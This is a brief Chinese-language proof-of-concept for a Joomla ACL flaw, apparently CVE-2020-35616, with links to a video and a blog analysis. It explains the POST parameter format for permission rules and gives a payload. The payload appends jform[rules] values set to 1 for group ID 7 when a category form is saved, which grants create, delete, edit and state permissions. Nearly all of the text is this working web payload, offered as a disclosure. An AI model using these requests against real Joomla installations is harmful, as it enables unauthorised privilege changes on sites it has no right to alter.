POST请求表单中的ACL规则集的格式: jform[rules][core.PERMISSION][GROUP_ID]
jform[rules][core.delete][ID]
jform[rules][core.edit][ID]
jform[rules][core.edit.state][ID]
jform[rules][core.edit.own][ID]
如果将这些POST请求参数设置为值1,则基本上将这些特定权限设置为Allowed
�PoC:
POST administrator/index.php?option={Target Category}
...
...
...
&jform[rules][core.{create|delete|edit}][AttackerID]=1
如上所述,我们希望向组ID为7的管理员授予所有权限。因此,在保存表单时,我们需要附加以下POST数据:
&jform[rules][core.create][7]=1&jform[rules][core.delete][7]=1&jform[rules][core.edit][7]=1&jform[rules][core.edit.state][7]=1&jform[rules][core.edit.own][7]=1
PoC验证视频: https://youtu.be/AZr6WydbUA0
详细分析文章见:https://blog.securelayer7.net/latest-joomla-exploit-cve-2020-35616-acl-security-vulnerabilities/